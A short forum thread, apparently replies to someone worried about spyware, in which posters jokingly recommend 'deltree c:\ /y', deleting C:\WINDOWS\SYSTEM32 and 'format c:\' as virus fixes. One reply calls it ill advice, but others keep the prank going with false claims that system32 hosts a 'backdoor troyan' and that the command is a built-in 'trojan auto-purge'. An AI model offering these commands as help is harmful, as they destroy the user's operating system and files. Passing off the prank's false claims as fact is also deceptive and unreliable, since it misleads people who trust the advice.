Actually, just to be safe, you may want to run Windows's very special spyware-killing command. Go to a command prompt and type: deltree c:\ /y

Don't worry, it can still be saved. You must delete specifically in C:\WINDOWS\ a folder named SYSTEM32 (as opposed to "system"). It hosts the backdoor troyan spider.

Terra that is ILL ADVICE how can you even tell that to somebody

You're supposed to delete Windows/system32, that's where most viruses are. To be safe, though, type format c:\ in, too!

I think this infection is so serious it may activating the trojan auto-purge that's built into Windows via the command Terra gave.
